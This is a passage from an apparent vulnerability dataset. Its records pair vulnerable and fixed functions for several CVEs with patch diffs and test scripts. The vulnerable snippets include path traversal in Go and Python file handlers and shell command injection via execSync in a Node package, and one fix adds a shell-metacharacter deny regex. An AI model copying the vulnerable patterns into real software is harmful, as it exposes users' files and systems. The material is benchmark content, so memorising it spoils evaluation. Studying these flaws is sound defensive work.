arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, \"/\")`). This issue is also tracked as GHSL-2023-274.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/SpectoLabs/hoverfly", "patch_url": ["https://github.com/SpectoLabs/hoverfly/commit/40f9b44"], "programing_language": "Go", "vul_func": [{"id": "vul_go_48_1", "commit": "4b6fa36", "file_path": "core/hoverfly_funcs.go", "start_line": 186, "end_line": 197, "snippet": "func (hf *Hoverfly) readResponseBodyFile(filePath string) (string, error) {\n\tif filepath.IsAbs(filePath) {\n\t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). 
only relative is supported\", filePath)\n\t}\n\n\tfileContents, err := ioutil.ReadFile(filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(fileContents[:]), nil\n}"}], "fix_func": [{"id": "fix_go_48_1", "commit": "40f9b44", "file_path": "core/hoverfly_funcs.go", "start_line": 186, "end_line": 202, "snippet": "func (hf *Hoverfly) readResponseBodyFile(filePath string) (string, error) {\n\tif filepath.IsAbs(filePath) {\n\t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). only relative is supported\", filePath)\n\t}\n\n\tresolvedPath, err := util.ResolveAndValidatePath(hf.Cfg.ResponsesBodyFilesPath, filePath)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tfileContents, err := os.ReadFile(resolvedPath)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(fileContents[:]), nil\n}"}, {"id": "fix_go_48_2", "commit": "40f9b44", "file_path": "core/util/util.go", "start_line": 522, "end_line": 548, "snippet": "func ResolveAndValidatePath(basePath, relativePath string) (string, error) {\n\tabsBasePath, err := filepath.Abs(basePath)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to get absolute base path: %v\", err)\n\t}\n\n\tcleanRelativePath := filepath.Clean(relativePath)\n\n\t// Check if the relative path starts with \"..\"\n\tif strings.HasPrefix(cleanRelativePath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"relative path is invalid as it attempts to backtrack\")\n\t}\n\n\tresolvedPath := filepath.Join(absBasePath, cleanRelativePath)\n\n\t// Verify that the resolved path is indeed a subpath of the base path\n\tfinalPath, err := filepath.Rel(absBasePath, resolvedPath)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to get relative path: %v\", err)\n\t}\n\n\tif strings.HasPrefix(finalPath, \"..\") {\n\t\treturn \"\", fmt.Errorf(\"resolved path is outside the base path\")\n\t}\n\n\treturn resolvedPath, nil\n}"}], "vul_patch": "--- a/core/hoverfly_funcs.go\n+++ b/core/hoverfly_funcs.go\n@@ -3,7 +3,12 @@\n \t\treturn \"\", fmt.Errorf(\"bodyFile contains absolute path (%s). 
only relative is supported\", filePath)\n \t}\n \n-\tfileContents, err := ioutil.ReadFile(filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath))\n+\tresolvedPath, err := util.ResolveAndValidatePath(hf.Cfg.ResponsesBodyFilesPath, filePath)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\tfileContents, err := os.ReadFile(resolvedPath)\n \tif err != nil {\n \t\treturn \"\", err\n \t}\n\n--- /dev/null\n+++ b/core/hoverfly_funcs.go\n@@ -0,0 +1,27 @@\n+func ResolveAndValidatePath(basePath, relativePath string) (string, error) {\n+\tabsBasePath, err := filepath.Abs(basePath)\n+\tif err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to get absolute base path: %v\", err)\n+\t}\n+\n+\tcleanRelativePath := filepath.Clean(relativePath)\n+\n+\t// Check if the relative path starts with \"..\"\n+\tif strings.HasPrefix(cleanRelativePath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"relative path is invalid as it attempts to backtrack\")\n+\t}\n+\n+\tresolvedPath := filepath.Join(absBasePath, cleanRelativePath)\n+\n+\t// Verify that the resolved path is indeed a subpath of the base path\n+\tfinalPath, err := filepath.Rel(absBasePath, resolvedPath)\n+\tif err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to get relative path: %v\", err)\n+\t}\n+\n+\tif strings.HasPrefix(finalPath, \"..\") {\n+\t\treturn \"\", fmt.Errorf(\"resolved path is outside the base path\")\n+\t}\n+\n+\treturn resolvedPath, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-45388:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/hoverfly\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestReadResponseBodyFile$ github.com/SpectoLabs/hoverfly/core\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-45388:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/hoverfly\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run 
'^(Test_Identical_ReturnsFalseWithDifferentArrayOfSameLength|Test_SortQueryString_ReordersQueryValuesAlphabetically|Test_MinifyJson_ErrorsOnInvalidJsonString|Test_GetContentTypeFromHeaders_ReturnsEmptyStringIfHeadersAreNil|Test_Contains_ReturnsFalseWithContainingNoneOfValuesSpecified|Test_SortQueryString_ReordersQueryValuesNumerically|Test_Identical_ReturnsTrue_WithExactlySameArray|Test_MinifyXml_SimplifiesXmlString|Test_GetResponseBody_GettingTheResponseBodySetsTheSameBodyAgain|Test_SortQueryString_KeepsAsteriskInTact|Test_SortQueryString_PreservesEqualsAndEmptyValueQuery|Test_MinifyJson_MinifiesJsonString|Test_ContainsOnly_ReturnsTrueWithIdenticalArray|Test_GetContentTypeFromHeaders_ReturnsXmlIfXml|Test_Contains_ReturnsTrueWithContainingOneOfValues|Test_SortQueryString_PreservesBothEqualsAndNoEqualsWithEmptyValue|Test_CopyMap|Test_Identical_ReturnsFalseWithDifferentArrayOfDifferentLength|Test_GetContentTypeFromHeaders_ReturnsJsonIfJson|Test_Contains_ReturnsTrueWithContainingBothValues|Test_ContainsOnly_ReturnsTrueWithArrayContainingOnlyValuesWithDups|Test_GetContentTypeFromHeaders_ReturnsEmptyStringIfHeadersAreEmpty|Test_ContainsOnly_ReturnsFalseWithEmptyArrayMatcher|Test_GetResponseBody_GettingTheResponseBodyGetsTheCorrectData|Test_JSONMarshal_MarshalsIntoJson|Test_GetRequestBody_GettingTheRequestBodySetsTheSameBodyAgain|Test_ContainsOnly_ReturnsTrueWithArrayInDifferentOrder|Test_GetRequestBody_GettingTheRequestBodyGetsTheCorrectData|Test_SortQueryString_PreservesNoEqualsAndEmptyValueQuery|Test_MinifyXml_MinifiesXmlString|Test_ContainsOnly_ReturnsTrueWithSubsetOfValues|Test_SortQueryString_ReordersQueryStringAlphabetically|Test_ContainsOnly_ReturnFalseWithOneExtraValue|Test_Contains_ReturnsFalseWithEmptyArrayMatcher|Test_SortQueryString_ReordersQueryValuesAlphanumerically|Test_GetRequestBody_DecompressGzipContent)$' github.com/SpectoLabs/hoverfly/core/util"} {"cve_id": "CVE-2020-7795", "cve_description": "The package get-npm-package-version before 1.0.7 are vulnerable to Command Injection via main function in index.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/hoperyy/get-npm-package-version", "patch_url": ["https://github.com/hoperyy/get-npm-package-version/commit/40b1cf31a0607ea66f9e30a0c3af1383b52b2dec", "https://github.com/hoperyy/get-npm-package-version/commit/49459d4a3ce68587d48ffa8dead86fc9ed58e965"], "programing_language": "JavaScript", "vul_func": 
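Illustrative Python counterpart of Hoverfly's ResolveAndValidatePath helper above: join, resolve, then prove the result is still inside the base directory, refusing anything that backtracks out of it.

from pathlib import Path

def resolve_and_validate(base: str, relative: str) -> Path:
    base_path = Path(base).resolve()
    candidate = (base_path / relative).resolve()
    try:
        candidate.relative_to(base_path)  # raises ValueError on escape
    except ValueError:
        raise ValueError("resolved path is outside the base path") from None
    return candidate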
[{"id": "vul_js_16_1", "commit": "5279786", "file_path": "index.js", "start_line": 1, "end_line": 28, "snippet": "module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n let version;\n\n const config = {\n stdio: ['pipe', 'pipe', 'ignore']\n };\n\n if (timeout) {\n config.timeout = timeout;\n }\n\n if (registry) {\n version = require('child_process').execSync(`npm view ${packageName} version --registry ${registry}`, config);\n } else {\n version = require('child_process').execSync(`npm view ${packageName} version`, config);\n }\n\n if (version) {\n return version.toString().trim().replace(/^\\n*/, '').replace(/\\n*$/, '');\n } else {\n return null;\n }\n\n } catch(err) {\n return null;\n }\n}"}], "fix_func": [{"id": "fix_js_16_1", "commit": "40b1cf3", "file_path": "index.js", "start_line": 1, "end_line": 31, "snippet": "module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n if (/[`$&{}[;|]/g.test(packageName) || /[`$&{}[;|]/g.test(registry)) {\n return null\n }\n let version;\n\n const config = {\n stdio: ['pipe', 'pipe', 'ignore']\n };\n\n if (timeout) {\n config.timeout = timeout;\n }\n\n if (registry) {\n version = require('child_process').execSync(`npm view ${packageName} version --registry ${registry}`, config);\n } else {\n version = require('child_process').execSync(`npm view ${packageName} version`, config);\n }\n\n if (version) {\n return version.toString().trim().replace(/^\\n*/, '').replace(/\\n*$/, '');\n } else {\n return null;\n }\n\n } catch(err) {\n return null;\n }\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,5 +1,8 @@\n module.exports = function (packageName, { registry = '', timeout = null } = {}) {\n try {\n+ if (/[`$&{}[;|]/g.test(packageName) || /[`$&{}[;|]/g.test(registry)) {\n+ return null\n+ }\n let version;\n \n const config = {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7795:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/get-npm-package-version\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7795:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/get-npm-package-version\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test"} {"cve_id": "CVE-2023-37659", "cve_description": "xalpha v0.11.4 is vulnerable to Remote Command Execution (RCE).", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that 
could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/refraction-ray/xalpha", "patch_url": ["https://github.com/refraction-ray/xalpha/commit/6dceaa159a1a319d750ade20a4595956876657b6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_94_1", "commit": "06a161f", "file_path": "xalpha/info.py", "start_line": "521", "end_line": "568", "snippet": " def __init__(\n self,\n code,\n round_label=0,\n dividend_label=0,\n fetch=False,\n save=False,\n path=\"\",\n form=\"csv\",\n priceonly=False,\n ):\n if round_label == 1 or (code in droplist):\n label = 1 # the scheme of round down on share purchase\n else:\n label = 0\n if code.startswith(\"F\") and code[1:].isdigit():\n code = code[1:]\n elif code.startswith(\"M\") and code[1:].isdigit():\n raise FundTypeError(\n \"This code seems to be a mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n self._feeurl = (\n \"http://fund.eastmoney.com/f10/jjfl_\" + code + \".html\"\n ) # html url for trade fees info of certain fund\n self.priceonly = priceonly\n\n super().__init__(\n code,\n fetch=fetch,\n save=save,\n path=path,\n form=form,\n round_label=label,\n dividend_label=dividend_label,\n )\n\n self.special = self.price[self.price[\"comment\"] != 0]\n self.specialdate = list(self.special[\"date\"])\n # date with nonvanishing comment, usually fenhong or zhesuan\n try:\n self.fenhongdate = list(self.price[self.price[\"comment\"] > 0][\"date\"])\n self.zhesuandate = list(self.price[self.price[\"comment\"] < 0][\"date\"])\n except TypeError:\n print(\"There are still string comments for the fund!\")"}], "fix_func": [{"id": "fix_py_94_1", "commit": "6dceaa1", "file_path": "xalpha/info.py", "start_line": "521", "end_line": "570", "snippet": " def __init__(\n self,\n code,\n round_label=0,\n dividend_label=0,\n fetch=False,\n save=False,\n path=\"\",\n form=\"csv\",\n priceonly=False,\n ):\n if round_label == 1 or (code in droplist):\n label = 1 # the scheme of round down on share purchase\n else:\n label = 0\n if code.startswith(\"F\") and code[1:].isdigit():\n code = code[1:]\n elif code.startswith(\"M\") and code[1:].isdigit():\n raise FundTypeError(\n \"This code seems to be a mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n assert code.isdigit(), \"fund code must be a strin of six digits\"\n assert len(code) == 6, \"fund code must be a strin of six digits\"\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n self._feeurl = (\n \"http://fund.eastmoney.com/f10/jjfl_\" + code + \".html\"\n ) # html url for trade fees info of certain fund\n self.priceonly = priceonly\n\n super().__init__(\n code,\n fetch=fetch,\n save=save,\n path=path,\n form=form,\n round_label=label,\n dividend_label=dividend_label,\n )\n\n self.special = self.price[self.price[\"comment\"] != 0]\n self.specialdate = list(self.special[\"date\"])\n # date with nonvanishing comment, usually fenhong or zhesuan\n try:\n self.fenhongdate = list(self.price[self.price[\"comment\"] > 0][\"date\"])\n self.zhesuandate = list(self.price[self.price[\"comment\"] < 0][\"date\"])\n except TypeError:\n print(\"There are still string comments for the fund!\")"}], "vul_patch": "--- a/xalpha/info.py\n+++ b/xalpha/info.py\n@@ -20,6 +20,8 @@\n \"This code seems to be a 
mfund, use ``mfundinfo`` instead\"\n )\n code = code.zfill(6) # 1234 is the same as 001234\n+ assert code.isdigit(), \"fund code must be a strin of six digits\"\n+ assert len(code) == 6, \"fund code must be a strin of six digits\"\n self._url = (\n \"http://fund.eastmoney.com/pingzhongdata/\" + code + \".js\"\n ) # js url api for info of certain fund\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-32005", "cve_description": "NiceGUI is an easy-to-use, Python-based UI framework. A local file inclusion is present in the NiceUI leaflet component when requesting resource files under the `/_nicegui/{__version__}/resources/{key}/{path:path}` route. As a result any file on the backend filesystem which the web server has access to can be read by an attacker with access to the NiceUI leaflet website. This vulnerability has been addressed in version 1.4.21. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/zauberzeug/nicegui", "patch_url": ["https://github.com/zauberzeug/nicegui/commit/ed12eb14f2a6c48b388a05c04b3c5a107ea9d330"], "programing_language": "Python", "vul_func": [{"id": "vul_py_123_1", "commit": "7c3e01a", "file_path": "nicegui/nicegui.py", "start_line": 96, "end_line": 103, "snippet": "def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n if filepath.exists():\n headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n return FileResponse(filepath, media_type=media_type, headers=headers)\n raise HTTPException(status_code=404, detail=f'resource \"{key}\" not found')"}], "fix_func": [{"id": "fix_py_123_1", "commit": "ed12eb1", "file_path": "nicegui/nicegui.py", "start_line": 96, "end_line": 107, "snippet": "def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n try:\n filepath.resolve().relative_to(resources[key].path.resolve()) # NOTE: use is_relative_to() in Python 3.9\n except ValueError as e:\n raise HTTPException(status_code=403, detail='forbidden') from e\n if filepath.exists():\n headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n return FileResponse(filepath, media_type=media_type, headers=headers)\n raise HTTPException(status_code=404, detail=f'resource \"{key}\" not found')"}], "vul_patch": "--- a/nicegui/nicegui.py\n+++ b/nicegui/nicegui.py\n@@ -1,6 +1,10 @@\n def _get_resource(key: str, path: str) -> FileResponse:\n if key in resources:\n filepath = resources[key].path / path\n+ try:\n+ filepath.resolve().relative_to(resources[key].path.resolve()) # NOTE: use is_relative_to() in Python 3.9\n+ except ValueError as e:\n+ raise HTTPException(status_code=403, detail='forbidden') from e\n if filepath.exists():\n 
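A cautionary variant of the xalpha check above: the patch relies on assert statements, which are stripped when Python runs with -O, so an explicit exception is the more dependable form. The helper below is hypothetical.

def validate_fund_code(code: str) -> str:
    code = code.zfill(6)
    if not (code.isdigit() and len(code) == 6):
        raise ValueError("fund code must be a string of six digits")
    return code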
headers = {'Cache-Control': 'public, max-age=3600'}\n media_type, _ = mimetypes.guess_type(filepath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-24900", "cve_description": "Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Since the \"malicious\" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks. A patch with a fix is available on the `master` branch of the GitHub repository. This can also be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `flask.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/onlaj/Piano-LED-Visualizer", "patch_url": ["https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_105_1", "commit": "6a732ca", "file_path": "webinterface/views_api.py", "start_line": "145", "end_line": "1114", "snippet": "def change_setting():\n setting_name = request.args.get('setting_name')\n value = request.args.get('value')\n second_value = request.args.get('second_value')\n disable_sequence = request.args.get('disable_sequence')\n\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n if (disable_sequence == \"true\"):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n\n if setting_name == \"clean_ledstrip\":\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"led_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.color_mode = \"Single\"\n\n webinterface.ledsettings.red = rgb[0]\n webinterface.ledsettings.green = rgb[1]\n webinterface.ledsettings.blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n webinterface.usersettings.change_setting_value(\"red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"light_mode\":\n webinterface.ledsettings.mode = value\n webinterface.usersettings.change_setting_value(\"mode\", value)\n\n if setting_name == \"fading_speed\" or setting_name == \"velocity_speed\":\n webinterface.ledsettings.fadingspeed = int(value)\n webinterface.usersettings.change_setting_value(\"fadingspeed\", webinterface.ledsettings.fadingspeed)\n\n if setting_name == \"brightness\":\n webinterface.usersettings.change_setting_value(\"brightness_percent\", int(value))\n 
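The NiceGUI fix above resolves the joined path and requires it to stay inside the resource root, answering 403 before the `exists()` check ever runs. A framework-free sketch of the same containment check, assuming a generic `base` directory (names are illustrative); on Python 3.9+ the `try/except` collapses to `Path.is_relative_to`, as the patch comment notes:

```python
from pathlib import Path

def contained(base: Path, requested: str) -> Path:
    """Resolve base/requested and refuse anything that escapes base (sketch)."""
    root = base.resolve()
    candidate = (root / requested).resolve()
    try:
        candidate.relative_to(root)  # raises ValueError if outside root
    except ValueError:
        raise PermissionError("forbidden")
    # Python >= 3.9 equivalent: if not candidate.is_relative_to(root): ...
    return candidate

# contained(Path("resources/leaflet"), "leaflet.js")        -> served path
# contained(Path("resources/leaflet"), "../../etc/passwd")  -> PermissionError
```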
webinterface.ledstrip.change_brightness(int(value), True)\n\n if setting_name == \"backlight_brightness\":\n webinterface.ledsettings.backlight_brightness_percent = int(value)\n webinterface.ledsettings.backlight_brightness = 255 * webinterface.ledsettings.backlight_brightness_percent / 100\n webinterface.usersettings.change_setting_value(\"backlight_brightness\",\n int(webinterface.ledsettings.backlight_brightness))\n webinterface.usersettings.change_setting_value(\"backlight_brightness_percent\",\n webinterface.ledsettings.backlight_brightness_percent)\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"backlight_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.backlight_red = rgb[0]\n webinterface.ledsettings.backlight_green = rgb[1]\n webinterface.ledsettings.backlight_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"backlight_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"backlight_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"backlight_blue\", rgb[2])\n\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"sides_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.adjacent_red = rgb[0]\n webinterface.ledsettings.adjacent_green = rgb[1]\n webinterface.ledsettings.adjacent_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"adjacent_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"adjacent_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"adjacent_blue\", rgb[2])\n\n if setting_name == \"sides_color_mode\":\n webinterface.ledsettings.adjacent_mode = value\n webinterface.usersettings.change_setting_value(\"adjacent_mode\", value)\n\n if setting_name == \"input_port\":\n webinterface.usersettings.change_setting_value(\"input_port\", value)\n webinterface.midiports.change_port(\"inport\", value)\n\n if setting_name == \"secondary_input_port\":\n webinterface.usersettings.change_setting_value(\"secondary_input_port\", value)\n\n if setting_name == \"play_port\":\n webinterface.usersettings.change_setting_value(\"play_port\", value)\n webinterface.midiports.change_port(\"playport\", value)\n\n if setting_name == \"skipped_notes\":\n webinterface.usersettings.change_setting_value(\"skipped_notes\", value)\n webinterface.ledsettings.skipped_notes = value\n\n if setting_name == \"add_note_offset\":\n webinterface.ledsettings.add_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"append_note_offset\":\n webinterface.ledsettings.append_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"remove_note_offset\":\n webinterface.ledsettings.del_note_offset(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"note_offsets\":\n webinterface.usersettings.change_setting_value(\"note_offsets\", value)\n\n if setting_name == \"update_note_offset\":\n webinterface.ledsettings.update_note_offset(int(value) + 1, second_value)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"led_count\":\n webinterface.usersettings.change_setting_value(\"led_count\", int(value))\n webinterface.ledstrip.change_led_count(int(value), True)\n\n if setting_name == \"shift\":\n webinterface.usersettings.change_setting_value(\"shift\", int(value))\n webinterface.ledstrip.change_shift(int(value), True)\n\n if setting_name == \"reverse\":\n 
webinterface.usersettings.change_setting_value(\"reverse\", int(value))\n webinterface.ledstrip.change_reverse(int(value), True)\n\n if setting_name == \"color_mode\":\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n webinterface.ledsettings.color_mode = value\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_multicolor\":\n webinterface.ledsettings.addcolor()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"add_multicolor_and_set_value\":\n settings = json.loads(value)\n\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n for key, value in settings.items():\n rgb = wc.hex_to_rgb(\"#\" + value[\"color\"])\n\n webinterface.ledsettings.multicolor.append([int(rgb[0]), int(rgb[1]), int(rgb[2])])\n webinterface.ledsettings.multicolor_range.append([int(value[\"range\"][0]), int(value[\"range\"][1])])\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\",\n webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True)\n\n if setting_name == \"remove_multicolor\":\n webinterface.ledsettings.deletecolor(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"multicolor\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.multicolor[int(second_value)][0] = rgb[0]\n webinterface.ledsettings.multicolor[int(second_value)][1] = rgb[1]\n webinterface.ledsettings.multicolor[int(second_value)][2] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_left\":\n webinterface.ledsettings.multicolor_range[int(second_value)][0] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_right\":\n webinterface.ledsettings.multicolor_range[int(second_value)][1] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_all_multicolors\":\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n return jsonify(success=True)\n\n if setting_name == \"rainbow_offset\":\n webinterface.ledsettings.rainbow_offset = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_offset\",\n int(webinterface.ledsettings.rainbow_offset))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_scale\":\n webinterface.ledsettings.rainbow_scale = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_scale\",\n int(webinterface.ledsettings.rainbow_scale))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_timeshift\":\n 
webinterface.ledsettings.rainbow_timeshift = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_timeshift\",\n int(webinterface.ledsettings.rainbow_timeshift))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_slowest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_slowest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_slowest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_slowest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_slowest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_slowest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_slowest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_fastest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_fastest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_fastest[\"green\"] = rgb[1]\n 